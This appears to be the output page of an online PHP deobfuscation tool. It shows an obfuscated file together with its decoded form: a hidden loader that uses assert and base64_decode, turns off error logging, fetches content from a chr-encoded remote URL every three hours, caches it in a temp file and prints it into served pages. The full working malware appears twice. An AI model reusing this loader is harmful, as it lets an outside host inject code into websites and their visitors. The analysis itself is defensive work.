Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $wtxypo="a"."\x73"."s".chr(101)."\x72"."t"; $fbnjdqjfvh="\x62".chr(97).chr(1..

Decoded Output download


?><?php
#####################
?><?php

$GLOBALS["DEBUG"]=$DEBUG=0;

$timeout=8;

if($DEBUG>=3) { 
	ini_set("display_errors",TRUE);
	ini_set("error_reporting", E_ALL ^ E_NOTICE);
}else{
	@ini_set("display_errors",FALSE);
	@ini_set("error_reporting", 0);
}
@ini_set("log_errors", FALSE);
@ini_alter("log_errors", FALSE);
if(function_exists("restore_error_handler")) restore_error_handler();
if(function_exists("restore_exception_handler")) restore_exception_handler();

@set_time_limit($timeout+2);

$timestart=time();

#########

if(!function_exists("file_get_contents")){
function file_get_contents($file){
	$content=implode("",file($file));
 	if(strlen($content)<1) {return FALSE;}
	return $content;
}}

if(!function_exists("file_put_contents")){
@define("FILE_APPEND", 8);
function file_put_contents($file,$content="",$parm=""){
	if($parm==8||$parm=="FILE_APPEND"){$fp=fopen($file,"a");}
	else{$fp=fopen($file,"w");}
	if($fp){
		if(fwrite($fp,$content)===FALSE){return FALSE;}
		fclose($fp);
		return strlen($content);
	}else{return FALSE;}
}}

if(!function_exists("url_get_mini")){
function url_get_mini($url, $timeout=8, $DEBUG=0){

	$headers = array(
	 "user_agent" => "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2841.105 Safari/527.35"
	,"1" => "Accept-Language: en-US,en;q=0.5"
	,"2" => "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7"
	,"3" => "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
	,"4" => "Accept-Encoding: identity"
	,"5" => "Cache-Control: no-cache"
	,"6" => "Connection: close"
	);

	if(!stristr($url,"://")) $url="http://".$url;
	$a=parse_url($url);
	if(empty($a[port])){$a[port]=80;}
	if(empty($a[path])){$a[path]="/";}

    $res=FALSE;

    if( 1 && function_exists('curl_init') ){
	if(($sh=curl_init($url))){
		curl_setopt($sh, CURLOPT_HEADER, FALSE);
		curl_setopt($sh, CURLOPT_RETURNTRANSFER, TRUE);
		curl_setopt($sh, CURLOPT_TIMEOUT, $timeout);
		curl_setopt($sh, CURLOPT_CONNECTTIMEOUT, $timeout);
		curl_setopt($sh, CURLOPT_HTTPHEADER, $headers);
		curl_setopt($sh, CURLOPT_SSL_VERIFYPEER, false);
		curl_setopt($sh, CURLOPT_SSL_VERIFYHOST, false);
		$res=curl_exec($sh);
		curl_close($sh);
	}
    }

    elseif( 1 && (ini_set("allow_url_fopen", TRUE) || 1) && in_array(ini_get("allow_url_fopen"),array(1,TRUE,"TRUE","On","ON"))		){

	ini_set("default_socket_timeout", $timeout);
	ini_set("user_agent", str_replace("User-Agent: ","",$headers["user_agent"]));

	$opts = array(
		'http'=>array(
				 'method'=>	"GET"
				,'header'=>	implode("
",$headers)."
"
				,'timeout'=>	$timeout
			)	
		);
	$context = stream_context_create($opts);

	$res="";
	if(function_exists('file')){
		if(substr(PHP_VERSION,0,1)>=5 || substr(phpversion(),0,1)>=5) {
			$res = implode("",file($url, false, $context)); ## php5 GET+POST
		}else{
			$res = implode("",file($url)); ## phpALL GET
		}
	}
    }

    elseif( 1 && function_exists('fsockopen') ){

	$old_time_limit=ini_get("max_execution_time"); ## remember
	set_time_limit($timeout); ## only this timeout really work 

	$head=implode("
",$headers)."
";

	if(($sh=fsockopen($a[host], $a[port], $errno, $errstr, $timeout))){
		stream_set_timeout($sh,$timeout); ## this timeout not work 
		$str="GET"
			." {$a[path]}".(!empty($a[query])?"?{$a[query]}":"")." HTTP/1.0
"
			."Host: ".$a[host].(empty($a[port])||$a[port]==80?'':':'.$a[port])."
"
			.(!empty($head)?$head:'')
			."
"
		;
		fwrite($sh, $str);
		$res = "";
     		while(!feof($sh))
			{ $res .= fgets($sh, 4096); }
		fclose($sh);
		$res=substr($res, strpos($res,"

")+4);
	}	
	set_time_limit($old_time_limit); ## recover
    }

    if(strlen($res)<1) $res=FALSE;

    return $res;
}}

#########

$url_to=chr(104)."t".chr(116)."p".":"."/".chr(47)."f"."r".chr(101)."e"."w".chr(101)."b".chr(115).chr(116)."a".chr(116)."i"."s".chr(116).chr(105)."c"."s".chr(46).chr(110)."e".chr(116)."/"."i".chr(100).chr(52).chr(46)."p".chr(104).chr(112);

$wrdir="";
$FLAG=FALSE;
if($FLAG===FALSE && ($wrdir="/tmp") && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE && ($wrdir="/var/tmp") && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE && function_exists("sys_get_temp_dir") && ($wrdir=sys_get_temp_dir()) && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE && ($wrdir=ini_get("upload_tmp_dir")) && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE && ($wrdir=ini_get("session.save_path")) && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE && (count($tmp=stream_get_meta_data($fp=tmpfile()))>1 && fclose($fp) && $wrdir=dirname($tmp["uri"])) && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE && (($tmp=tempnam(1,111))!==FALSE && ($wrdir=dirname($tmp)) && unlink($tmp)) && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE && ($wrdir=getcwd()) && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE && ($wrdir=dirname(__FILE__)) && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE) { $wrdir=""; if($DEBUG) {die("<br>[-] TMPDIR not writable!");} else {die();} }
//print "<br>".$wrdir;

$wrpre="sess";
$uniq_key=dirname(__FILE__);

$f_resu = $wrdir."/".$wrpre."_".md5($uniq_key."js__9v");
$f_last = $wrdir."/".$wrpre."_".md5($uniq_key."last9v");

#########

$result_def='
//default
';

$timelast=FALSE;
$comment=FALSE;
$result=FALSE;


if( ( FALSE===($timelast=file_get_contents($f_last)) ) ) { $comment='upd_init'; $timelast='1'.','.$comment;  file_put_contents($f_last, $timelast); }
if( $comment===FALSE && strpos($timelast,',')) { $comment=substr($timelast, strpos($timelast,',')+1);  }
if( $comment===FALSE ) { $comment=$timestart; }

if(
	( 3600*3 < ($timestart - (int)$timelast) )
) {
	file_put_contents($f_last, $timestart.','.$comment);
	$result=url_get_mini($url_to, $timeout);
	if( !$result || strlen($result)<5 || !stristr($result,"onDate") ){
		//$result=$result_def; $comment='defau1t';
		$result=FALSE; $comment='upd_fail';
	}else{
		file_put_contents($f_resu, $result);
		$comment='upd_succ';
		file_put_contents($f_last, $timestart.','.$timestart);
	}
}

if( $result===FALSE ) $result=file_get_contents($f_resu);
if( $result===FALSE ) { $result=$result_def; file_put_contents($f_resu, $result); $comment='upd_init'; }

if( (int)$comment > 1 ){
	if(	3600*24*1  > ($timestart - (int)$comment) ) $comment='upd_today';
	elseif(	3600*24*7  > ($timestart - (int)$comment) ) $comment='upd_week';
	elseif(	3600*24*7  < ($timestart - (int)$comment) ) $comment='upd_more7day';
	else $comment='upd_'.(int)$comment;
}

print chr(42).chr(47)."
";
print $result;
print "
//info:".$comment;

$timeout=$timestart=$url_to=$wrpre=$uniq_key=$wrdir=$f_resu=$f_last=$result=$result_def=$timelast=$comment=FALSE;

die;

Did this file decode correctly?

Original Code

<?php



$wtxypo="a"."\x73"."s".chr(101)."\x72"."t";
$fbnjdqjfvh="\x62".chr(97).chr(115)."\x65".chr(54)."4".chr(95).chr(100)."e"."c"."\x6f".chr(100)."\x65";

@$wtxypo(
@$fbnjdqjfvh(
'eval(base64_decode('
?><?php
#####################
?><?php

$GLOBALS["DEBUG"]=$DEBUG=0;

$timeout=8;

if($DEBUG>=3) { 
	ini_set("display_errors",TRUE);
	ini_set("error_reporting", E_ALL ^ E_NOTICE);
}else{
	@ini_set("display_errors",FALSE);
	@ini_set("error_reporting", 0);
}
@ini_set("log_errors", FALSE);
@ini_alter("log_errors", FALSE);
if(function_exists("restore_error_handler")) restore_error_handler();
if(function_exists("restore_exception_handler")) restore_exception_handler();

@set_time_limit($timeout+2);

$timestart=time();

#########

if(!function_exists("file_get_contents")){
function file_get_contents($file){
	$content=implode("",file($file));
 	if(strlen($content)<1) {return FALSE;}
	return $content;
}}

if(!function_exists("file_put_contents")){
@define("FILE_APPEND", 8);
function file_put_contents($file,$content="",$parm=""){
	if($parm==8||$parm=="FILE_APPEND"){$fp=fopen($file,"a");}
	else{$fp=fopen($file,"w");}
	if($fp){
		if(fwrite($fp,$content)===FALSE){return FALSE;}
		fclose($fp);
		return strlen($content);
	}else{return FALSE;}
}}

if(!function_exists("url_get_mini")){
function url_get_mini($url, $timeout=8, $DEBUG=0){

	$headers = array(
	 "user_agent" => "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2841.105 Safari/527.35"
	,"1" => "Accept-Language: en-US,en;q=0.5"
	,"2" => "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7"
	,"3" => "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
	,"4" => "Accept-Encoding: identity"
	,"5" => "Cache-Control: no-cache"
	,"6" => "Connection: close"
	);

	if(!stristr($url,"://")) $url="http://".$url;
	$a=parse_url($url);
	if(empty($a[port])){$a[port]=80;}
	if(empty($a[path])){$a[path]="/";}

    $res=FALSE;

    if( 1 && function_exists('curl_init') ){
	if(($sh=curl_init($url))){
		curl_setopt($sh, CURLOPT_HEADER, FALSE);
		curl_setopt($sh, CURLOPT_RETURNTRANSFER, TRUE);
		curl_setopt($sh, CURLOPT_TIMEOUT, $timeout);
		curl_setopt($sh, CURLOPT_CONNECTTIMEOUT, $timeout);
		curl_setopt($sh, CURLOPT_HTTPHEADER, $headers);
		curl_setopt($sh, CURLOPT_SSL_VERIFYPEER, false);
		curl_setopt($sh, CURLOPT_SSL_VERIFYHOST, false);
		$res=curl_exec($sh);
		curl_close($sh);
	}
    }

    elseif( 1 && (ini_set("allow_url_fopen", TRUE) || 1) && in_array(ini_get("allow_url_fopen"),array(1,TRUE,"TRUE","On","ON"))		){

	ini_set("default_socket_timeout", $timeout);
	ini_set("user_agent", str_replace("User-Agent: ","",$headers["user_agent"]));

	$opts = array(
		'http'=>array(
				 'method'=>	"GET"
				,'header'=>	implode("\r\n",$headers)."\r\n"
				,'timeout'=>	$timeout
			)	
		);
	$context = stream_context_create($opts);

	$res="";
	if(function_exists('file')){
		if(substr(PHP_VERSION,0,1)>=5 || substr(phpversion(),0,1)>=5) {
			$res = implode("",file($url, false, $context)); ## php5 GET+POST
		}else{
			$res = implode("",file($url)); ## phpALL GET
		}
	}
    }

    elseif( 1 && function_exists('fsockopen') ){

	$old_time_limit=ini_get("max_execution_time"); ## remember
	set_time_limit($timeout); ## only this timeout really work 

	$head=implode("\r\n",$headers)."\r\n";

	if(($sh=fsockopen($a[host], $a[port], $errno, $errstr, $timeout))){
		stream_set_timeout($sh,$timeout); ## this timeout not work 
		$str="GET"
			." {$a[path]}".(!empty($a[query])?"?{$a[query]}":"")." HTTP/1.0\r\n"
			."Host: ".$a[host].(empty($a[port])||$a[port]==80?'':':'.$a[port])."\r\n"
			.(!empty($head)?$head:'')
			."\r\n"
		;
		fwrite($sh, $str);
		$res = "";
     		while(!feof($sh))
			{ $res .= fgets($sh, 4096); }
		fclose($sh);
		$res=substr($res, strpos($res,"\r\n\r\n")+4);
	}	
	set_time_limit($old_time_limit); ## recover
    }

    if(strlen($res)<1) $res=FALSE;

    return $res;
}}

#########

$url_to=chr(104)."t".chr(116)."\x70"."\x3a"."\x2f".chr(47)."\x66"."r".chr(101)."e"."\x77".chr(101)."b".chr(115).chr(116)."a".chr(116)."i"."s".chr(116).chr(105)."c"."\x73".chr(46).chr(110)."\x65".chr(116)."/"."i".chr(100).chr(52).chr(46)."\x70".chr(104).chr(112);

$wrdir="";
$FLAG=FALSE;
if($FLAG===FALSE && ($wrdir="/tmp") && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE && ($wrdir="/var/tmp") && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE && function_exists("sys_get_temp_dir") && ($wrdir=sys_get_temp_dir()) && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE && ($wrdir=ini_get("upload_tmp_dir")) && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE && ($wrdir=ini_get("session.save_path")) && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE && (count($tmp=stream_get_meta_data($fp=tmpfile()))>1 && fclose($fp) && $wrdir=dirname($tmp["uri"])) && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE && (($tmp=tempnam(1,111))!==FALSE && ($wrdir=dirname($tmp)) && unlink($tmp)) && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE && ($wrdir=getcwd()) && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE && ($wrdir=dirname(__FILE__)) && is_writable($wrdir)) $FLAG=TRUE;
if($FLAG===FALSE) { $wrdir=""; if($DEBUG) {die("<br>[-] TMPDIR not writable!");} else {die();} }
//print "<br>".$wrdir;

$wrpre="sess";
$uniq_key=dirname(__FILE__);

$f_resu = $wrdir."/".$wrpre."_".md5($uniq_key."js__9v");
$f_last = $wrdir."/".$wrpre."_".md5($uniq_key."last9v");

#########

$result_def='
//default
';

$timelast=FALSE;
$comment=FALSE;
$result=FALSE;


if( ( FALSE===($timelast=file_get_contents($f_last)) ) ) { $comment='upd_init'; $timelast='1'.','.$comment;  file_put_contents($f_last, $timelast); }
if( $comment===FALSE && strpos($timelast,',')) { $comment=substr($timelast, strpos($timelast,',')+1);  }
if( $comment===FALSE ) { $comment=$timestart; }

if(
	( 3600*3 < ($timestart - (int)$timelast) )
) {
	file_put_contents($f_last, $timestart.','.$comment);
	$result=url_get_mini($url_to, $timeout);
	if( !$result || strlen($result)<5 || !stristr($result,"onDate") ){
		//$result=$result_def; $comment='defau1t';
		$result=FALSE; $comment='upd_fail';
	}else{
		file_put_contents($f_resu, $result);
		$comment='upd_succ';
		file_put_contents($f_last, $timestart.','.$timestart);
	}
}

if( $result===FALSE ) $result=file_get_contents($f_resu);
if( $result===FALSE ) { $result=$result_def; file_put_contents($f_resu, $result); $comment='upd_init'; }

if( (int)$comment > 1 ){
	if(	3600*24*1  > ($timestart - (int)$comment) ) $comment='upd_today';
	elseif(	3600*24*7  > ($timestart - (int)$comment) ) $comment='upd_week';
	elseif(	3600*24*7  < ($timestart - (int)$comment) ) $comment='upd_more7day';
	else $comment='upd_'.(int)$comment;
}

print chr(42).chr(47)."\r\n";
print $result;
print "\r\n//info:".$comment;

$timeout=$timestart=$url_to=$wrpre=$uniq_key=$wrdir=$f_resu=$f_last=$result=$result_def=$timelast=$comment=FALSE;

die;
'));'));
#############################
?>

Function Calls

chr 7
assert 1
base64_decode 2

Variables

$wtxypo assert
$fbnjdqjfvh base64_decode

Stats

MD5 44e48dbb461b73a4ceb0d9176e14a719
Eval Count 2
Decode Time 109 ms